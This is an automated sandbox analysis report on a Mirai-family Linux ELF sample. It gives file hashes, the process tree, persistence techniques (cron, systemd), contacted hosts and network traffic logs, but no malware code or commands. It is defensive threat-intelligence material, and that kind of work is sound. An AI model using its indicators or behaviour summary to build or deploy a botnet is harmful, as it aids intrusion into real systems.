Linux
Analysis Report
m68k.elf
Overview
General Information
Sample name: | m68k.elf |
Analysis ID: | 1558937 |
MD5: | d7eaa2bceba9d7e0d2aa38e1ce1a3649 |
SHA1: | 77ca39cd70efba9684b254b9397881c8fb85b71d |
SHA256: | e5cc8bce6857e01c4c2ccc7ca4cfb47a5578c6a2b940be2e99c122589390fdc1 |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1558937 |
Start date and time: | 2024-11-20 00:56:08 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 51s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | m68k.elf |
Detection: | MAL |
Classification: | mal60.troj.linELF@0/4@25/0 |
- VT rate limit hit for: host.zopz-api.com
Command: | /tmp/m68k.elf |
PID: | 6224 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | we kinda rocking ngl |
Standard Error: |
- system is lnxubuntu20
- m68k.elf New Fork (PID: 6226, Parent: 6224)
- m68k.elf New Fork (PID: 6228, Parent: 6226)
- m68k.elf New Fork (PID: 6230, Parent: 6226)
- m68k.elf New Fork (PID: 6232, Parent: 6226)
- m68k.elf New Fork (PID: 6234, Parent: 6226)
- sh New Fork (PID: 6240, Parent: 6234)
- sh New Fork (PID: 6242, Parent: 6240)
- sh New Fork (PID: 6243, Parent: 6240)
- sh New Fork (PID: 6244, Parent: 6240)
- sh New Fork (PID: 6245, Parent: 6240)
- sh New Fork (PID: 6249, Parent: 6240)
- sh New Fork (PID: 6241, Parent: 6234)
- m68k.elf New Fork (PID: 6250, Parent: 6226)
- sh New Fork (PID: 6254, Parent: 6250)
- systemd New Fork (PID: 6257, Parent: 6256)
- dash New Fork (PID: 6331, Parent: 4331)
- dash New Fork (PID: 6332, Parent: 4331)
- cleanup
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: |
Source: | String: | ||
Source: | String: | ||
Source: | String: | ||
Source: | String: | ||
Source: | String: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | Reads hosts file: | Jump to behavior |
Source: | Socket: | Jump to behavior |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: |
Source: | .symtab present: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File written: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | Directory: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Chmod executable: | Jump to behavior | ||
Source: | Chmod executable: | Jump to behavior |
Source: | Rm executable: | Jump to behavior | ||
Source: | Rm executable: | Jump to behavior |
Source: | Systemctl executable: | Jump to behavior |
Source: | Queries kernel information via 'uname': | Jump to behavior | ||
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Unix Shell Configuration Modification | 1 Unix Shell Configuration Modification | 1 File and Directory Permissions Modification | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Systemd Service | 1 Systemd Service | 1 Hidden Files and Directories | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Scripting | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
29% | ReversingLabs | Linux.Backdoor.Mirai |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
cdn.fwupd.org | unknown | unknown | false | high | |
host.zopz-api.com | unknown | unknown | false | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
34.249.145.219 | unknown | United States | 16509 | AMAZON-02US | false | |
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
34.249.145.219 | Get hash | malicious | Mirai, Okiru | Browse | ||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
109.202.202.202 | Get hash | malicious | Unknown | Browse |
| |
91.189.91.43 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse | |||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse | |||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CANONICAL-ASGB | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
CANONICAL-ASGB | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
INIT7CH | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
AMAZON-02US | Get hash | malicious | Amadey, Stealc, Vidar | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Amadey, Stealc, Vidar | Browse |
|
Process: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File Type: | |
Category: | dropped |
Size (bytes): | 76 |
Entropy (8bit): | 3.7627880354948586 |
Encrypted: | false |
SSDEEP: | 3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb |
MD5: | D86A1F5765F37989EB0EC3837AD13ECC |
SHA1: | D749672A734D9DEAFD61DCA501C6929EC431B83E |
SHA-256: | 85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45 |
SHA-512: | 338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/m68k.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 178 |
Entropy (8bit): | 4.358630015292201 |
Encrypted: | false |
SSDEEP: | 3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL |
MD5: | C3685F292213652676F734AB36C060EE |
SHA1: | 1D05F7F6302EC60E7990DE4BBE9180C149EFC731 |
SHA-256: | D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C |
SHA-512: | 7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/m68k.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 356 |
Entropy (8bit): | 4.9110117370593995 |
Encrypted: | false |
SSDEEP: | 6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7 |
MD5: | F03C70CD4C61A1852F9E19B8FB0D639C |
SHA1: | A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008 |
SHA-256: | AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90 |
SHA-512: | 6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 235 |
Entropy (8bit): | 5.1026069467163655 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQLvaNFXqZHGMQ5UYLtCFt3HY8jsHB:8QjHig8mXeeHLUHY8mB |
MD5: | 78504BD41E411D1931F6C74D59E68598 |
SHA1: | 47F90D5B6A9578E07DF6A55282F251D66520405D |
SHA-256: | C8805FB4ECC3E5D3EEE0C5911E7038E9CCD59979BEAE6F89E4AA0093DC05AC6A |
SHA-512: | A2C92D3EC614FFEE60481B7F7261FA0EDBA9733F2588D45884FC91E82A347115649764D2DB08AE49A861899AEDC2548E5FB6D79C26A4781D64CDE718E074864C |
Malicious: | true |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.278250752108479 |
TrID: |
|
File name: | m68k.elf |
File size: | 81'348 bytes |
MD5: | d7eaa2bceba9d7e0d2aa38e1ce1a3649 |
SHA1: | 77ca39cd70efba9684b254b9397881c8fb85b71d |
SHA256: | e5cc8bce6857e01c4c2ccc7ca4cfb47a5578c6a2b940be2e99c122589390fdc1 |
SHA512: | 150c66f98971175c7ef3d45e12586dcb84941a9d349ce3593ef587e449b9d9afd8ce6ffd69c9e0fe74931a9b015189814793b99a4bc8b758a4618c7b56cb6ad5 |
SSDEEP: | 1536:7r9VBgyqw9wgPpTW0HCrBvY8rxXzztzHGpzs3mX3Ftq5ixE:7r9VBdqsPsiCrBv9LzHszsWu+E |
TLSH: | 16832A97B801CE6EF40BE6FA44E308157631BBA64D930F76B256FCE3A9351D41922F81 |
File Content Preview: | .ELF.......................D...4..;......4. ...(......................*T..*T...... .......*T..JT..JT......f....... .dt.Q............................NV..a....da.....N^NuNV..J9..M.f>"y..Jl QJ.g.X.#...JlN."y..Jl QJ.f.A.....J.g.Hy..*PN.X.......M.N^NuNV..N^NuN |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 80828 |
Section Header Size: | 40 |
Number of Section Headers: | 13 |
Header String Table Index: | 12 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x80000094 | 0x94 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 2 |
.text | PROGBITS | 0x800000a8 | 0xa8 | 0x112e6 | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.fini | PROGBITS | 0x8001138e | 0x1138e | 0xe | 0x0 | 0x6 | AX | 0 | 0 | 2 |
.rodata | PROGBITS | 0x8001139c | 0x1139c | 0x16b1 | 0x0 | 0x2 | A | 0 | 0 | 2 |
.eh_frame | PROGBITS | 0x80012a50 | 0x12a50 | 0x4 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.ctors | PROGBITS | 0x80014a54 | 0x12a54 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.dtors | PROGBITS | 0x80014a5c | 0x12a5c | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.jcr | PROGBITS | 0x80014a64 | 0x12a64 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x80014a68 | 0x12a68 | 0x390 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.bss | NOBITS | 0x80014df8 | 0x12df8 | 0x62e8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.comment | PROGBITS | 0x0 | 0x12df8 | 0xd6e | 0x0 | 0x0 | 0 | 0 | 1 | |
.shstrtab | STRTAB | 0x0 | 0x13b66 | 0x56 | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x80000000 | 0x80000000 | 0x12a54 | 0x12a54 | 6.2847 | 0x5 | R E | 0x2000 | .init .text .fini .rodata .eh_frame | |
LOAD | 0x12a54 | 0x80014a54 | 0x80014a54 | 0x3a4 | 0x668c | 3.0989 | 0x6 | RW | 0x2000 | .ctors .dtors .jcr .data .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 00:56:55.892488956 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Nov 20, 2024 00:56:58.964118004 CET | 42124 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:57:01.523519993 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Nov 20, 2024 00:57:02.803369045 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Nov 20, 2024 00:57:16.201420069 CET | 39282 | 443 | 192.168.2.23 | 34.249.145.219 |
Nov 20, 2024 00:57:16.201453924 CET | 443 | 39282 | 34.249.145.219 | 192.168.2.23 |
Nov 20, 2024 00:57:16.201558113 CET | 39282 | 443 | 192.168.2.23 | 34.249.145.219 |
Nov 20, 2024 00:57:16.202033043 CET | 39282 | 443 | 192.168.2.23 | 34.249.145.219 |
Nov 20, 2024 00:57:16.202048063 CET | 443 | 39282 | 34.249.145.219 | 192.168.2.23 |
Nov 20, 2024 00:57:16.625426054 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Nov 20, 2024 00:57:28.911777973 CET | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Nov 20, 2024 00:57:33.007181883 CET | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Nov 20, 2024 00:57:38.718327999 CET | 42130 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:57:39.726290941 CET | 42130 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:57:41.742057085 CET | 42130 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:57:45.805432081 CET | 42130 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:57:54.216175079 CET | 42132 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:57:55.244123936 CET | 42132 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:57:57.259840965 CET | 42132 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:57:57.583868980 CET | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Nov 20, 2024 00:58:01.419249058 CET | 42132 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:58:09.713936090 CET | 42134 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:58:10.729957104 CET | 42134 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:58:12.745709896 CET | 42134 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:58:16.193541050 CET | 39282 | 443 | 192.168.2.23 | 34.249.145.219 |
Nov 20, 2024 00:58:16.235383034 CET | 443 | 39282 | 34.249.145.219 | 192.168.2.23 |
Nov 20, 2024 00:58:16.777122021 CET | 42134 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:59:02.161637068 CET | 443 | 39282 | 34.249.145.219 | 192.168.2.23 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 00:57:01.973237038 CET | 40664 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:57:03.234822035 CET | 45197 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:57:07.223093033 CET | 59217 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:57:08.243406057 CET | 36775 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:57:12.471718073 CET | 34918 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:57:13.246608973 CET | 45241 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:57:17.720997095 CET | 36449 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:57:18.249865055 CET | 40119 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:57:22.970249891 CET | 48249 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:57:23.253140926 CET | 52527 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:57:28.219598055 CET | 35973 | 53 | 192.168.2.23 | 8.8.8.8 |
Nov 20, 2024 00:57:33.468842030 CET | 57708 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:57:48.255225897 CET | 51915 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:57:48.966810942 CET | 56420 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:57:53.256874084 CET | 53613 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:57:58.260509014 CET | 43864 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:58:03.264420986 CET | 44562 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:58:04.464605093 CET | 52052 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:58:08.268265009 CET | 33397 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:58:19.962522984 CET | 58074 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:58:33.269752979 CET | 44172 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:58:38.271058083 CET | 47356 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:58:43.275012970 CET | 55670 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:58:48.278249979 CET | 41850 | 53 | 192.168.2.23 | 1.1.1.1 |
Nov 20, 2024 00:58:53.281084061 CET | 51247 | 53 | 192.168.2.23 | 1.1.1.1 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 20, 2024 00:57:01.973237038 CET | 192.168.2.23 | 1.1.1.1 | 0x3d5 | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:03.234822035 CET | 192.168.2.23 | 1.1.1.1 | 0x2764 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:07.223093033 CET | 192.168.2.23 | 8.8.8.8 | 0x3d5 | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:08.243406057 CET | 192.168.2.23 | 1.1.1.1 | 0x2764 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:12.471718073 CET | 192.168.2.23 | 1.1.1.1 | 0x3d5 | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:13.246608973 CET | 192.168.2.23 | 1.1.1.1 | 0x2764 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:17.720997095 CET | 192.168.2.23 | 8.8.8.8 | 0x3d5 | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:18.249865055 CET | 192.168.2.23 | 1.1.1.1 | 0x2764 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:22.970249891 CET | 192.168.2.23 | 1.1.1.1 | 0x3d5 | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:23.253140926 CET | 192.168.2.23 | 1.1.1.1 | 0x2764 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:28.219598055 CET | 192.168.2.23 | 8.8.8.8 | 0x3d5 | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:33.468842030 CET | 192.168.2.23 | 1.1.1.1 | 0x3d5 | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:48.255225897 CET | 192.168.2.23 | 1.1.1.1 | 0x6308 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:48.966810942 CET | 192.168.2.23 | 1.1.1.1 | 0x3d5 | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:53.256874084 CET | 192.168.2.23 | 1.1.1.1 | 0x6308 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:58.260509014 CET | 192.168.2.23 | 1.1.1.1 | 0x6308 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:03.264420986 CET | 192.168.2.23 | 1.1.1.1 | 0x6308 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:04.464605093 CET | 192.168.2.23 | 1.1.1.1 | 0x3d5 | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:58:08.268265009 CET | 192.168.2.23 | 1.1.1.1 | 0x6308 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:19.962522984 CET | 192.168.2.23 | 1.1.1.1 | 0x3d5 | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:58:33.269752979 CET | 192.168.2.23 | 1.1.1.1 | 0x9117 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:38.271058083 CET | 192.168.2.23 | 1.1.1.1 | 0x9117 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:43.275012970 CET | 192.168.2.23 | 1.1.1.1 | 0x9117 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:48.278249979 CET | 192.168.2.23 | 1.1.1.1 | 0x9117 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:53.281084061 CET | 192.168.2.23 | 1.1.1.1 | 0x9117 | Standard query (0) | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 23:56:58 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/m68k.elf |
Arguments: | /tmp/m68k.elf |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 23:56:58 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/m68k.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 23:56:58 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/m68k.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/m68k.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/m68k.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/m68k.elf |
Arguments: | - |
File size: | 4463432 bytes |
MD5 hash: | cd177594338c77b895ae27c33f8f86cc |
Start time (UTC): | 23:57:02 |
Start date (UTC): | 19/11/2024 |
Path: | /bin/sh |
